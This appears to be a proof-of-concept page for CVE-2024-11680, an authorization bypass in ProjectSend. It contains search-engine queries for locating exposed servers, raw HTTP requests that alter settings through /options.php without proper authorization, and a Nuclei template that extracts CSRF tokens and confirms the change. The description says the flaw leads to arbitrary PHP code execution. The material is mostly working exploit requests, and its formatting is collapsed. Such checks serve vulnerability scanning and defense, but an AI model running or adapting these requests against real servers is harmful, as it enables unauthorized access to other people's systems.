CVE-2024-11680

fofa: body="ProjectSend"Quake：body:"ProjectSend"

POST /options.php HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Connection: closeContent-Length: 138Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8Accept-Encoding: gzipcsrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2pei9Dunmem7Jdkj6PbVXS13glW

GET/ HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Connection: closeCookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8Accept-Encoding: gzip

POST /options.php HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Connection: closeContent-Length: 138Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8Accept-Encoding: gzipcsrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2peHaMAlgDO7f4j4cx0MtyyqdxO

id: projectsend-auth-bypassinfo:  name: ProjectSend <= r1605 - Improper Authorization  author: DhiyaneshDK  severity: high  description: |    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.  reference:    - https://www.projectsend.org/    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf  metadata:    verified: true    max-request: 1    fofa-query: body="ProjectSend"    shodan-query: html:"ProjectSend"  tags: misconfig,projectsend,auth-bypass,intrusivevariables:  string: "{{randstr}}"flow: http(1) && http(2) && http(3) && http(4) && http(5)http:  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "projectsend")'        condition: and        internal: true    extractors:      - type: regex        name: csrf        group: 1        regex:          - 'name="csrf_token" value="([0-9a-z]+)"'        internal: true      - type: regex        name: title        group: 1        regex:          - '<title>Log in &raquo; ([0-9a-zA-Z]+)</title>'        internal: true  - raw:      - |        POST /options.php HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        csrf_token={{csrf}}&section=general&this_install_title={{string}}    matchers:      - type: dsl        dsl:          - 'status_code == 500'          - 'contains(content_type, "text/html")'        condition: and        internal: true  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "{{string}}")'        condition: and        internal: true  - raw:      - |        POST /options.php HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        csrf_token={{csrf}}&section=general&this_install_title={{title}}    matchers:      - type: dsl        dsl:          - 'status_code == 500'          - 'contains(content_type, "text/html")'        condition: and        internal: true  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "{{title}}")'        condition: and# poc运行失败的话下载新版的nuclei试下